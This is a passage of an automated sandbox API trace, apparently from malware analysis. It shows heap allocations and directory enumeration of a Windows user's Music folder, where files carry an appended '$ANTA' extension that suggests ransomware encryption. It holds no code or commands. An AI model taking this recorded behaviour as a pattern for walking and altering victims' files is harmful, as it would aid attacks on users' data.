HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0111.407] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0111.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0111.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0111.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0111.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0111.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0111.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0111.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0111.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0111.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0111.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0111.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0111.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0111.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0111.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0111.407] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0111.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0111.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0111.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0111.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0111.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0111.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0111.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0111.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0111.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0111.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0111.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0111.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0111.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0111.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0111.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0111.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0111.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0111.408] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\*", lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe878d8a, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xe878d8a, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9ef0, cFileName=".", cAlternateFileName="")) returned 0x41ac180 [0111.408] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe878d8a, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xe878d8a, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9ef0, cFileName="..", cAlternateFileName="")) returned 1 [0111.408] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd69e547, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xd69e547, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xd8ad133, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x6fc0, dwReserved0=0x0, dwReserved1=0x43c9ef0, cFileName="2 MaJ1.m4a.$ANTA", cAlternateFileName="2MAJ1M~1.$AN")) returned 1 [0111.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0111.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0111.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0111.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0111.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0111.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0111.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0111.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0111.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0111.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0111.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.408] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea490 [0111.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0111.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea490 | out: hHeap=0x1780000) returned 1 [0111.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0111.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.409] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0111.409] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0111.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0111.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0111.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0111.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0111.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0111.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0111.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0111.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0111.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0111.409] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0111.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0111.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0111.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.410] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0111.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0111.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0111.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9bf0 [0111.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0111.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0111.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0111.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0111.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0111.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0111.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0b8 [0111.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ff8 [0111.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0111.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0111.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0111.410] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.410] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0111.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0111.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0111.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0111.410] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f32a4e0, ftCreationTime.dwHighDateTime=0x1d5e288, ftLastAccessTime.dwLowDateTime=0x53cc5140, ftLastAccessTime.dwHighDateTime=0x1d5ef32, ftLastWriteTime.dwLowDateTime=0x53cc5140, ftLastWriteTime.dwHighDateTime=0x1d5ef32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="9sMMb260B1u", cAlternateFileName="9SMMB2~1")) returned 1 [0111.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0111.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0111.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0111.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0111.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0111.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0111.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0111.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0111.411] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0111.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9578 [0111.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0111.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0111.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0111.411] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0111.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0111.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0111.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0111.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0111.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0111.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0111.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0111.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0111.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0111.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0111.411] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0111.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0111.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0111.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0111.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0111.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0111.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0111.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0111.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0111.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0111.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0111.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0111.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0111.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0111.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0111.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0111.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0111.412] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0111.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0111.412] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0111.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0111.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0111.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0111.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0111.412] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb5bea8, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xdb5bea8, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xdc8d180, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="desktop.ini.$ANTA", cAlternateFileName="DESKTO~1.$AN")) returned 1 [0111.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0111.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0111.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0111.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0111.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0111.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0111.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0111.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0111.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0111.413] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0111.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9578 [0111.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0111.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0111.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0111.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0111.413] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0111.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0111.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0111.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0111.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e18 [0111.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0111.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0111.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0111.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0111.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0111.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0111.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0111.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0111.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f20 [0111.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f80 [0111.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0111.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0111.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0111.414] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0111.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0111.414] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0111.414] 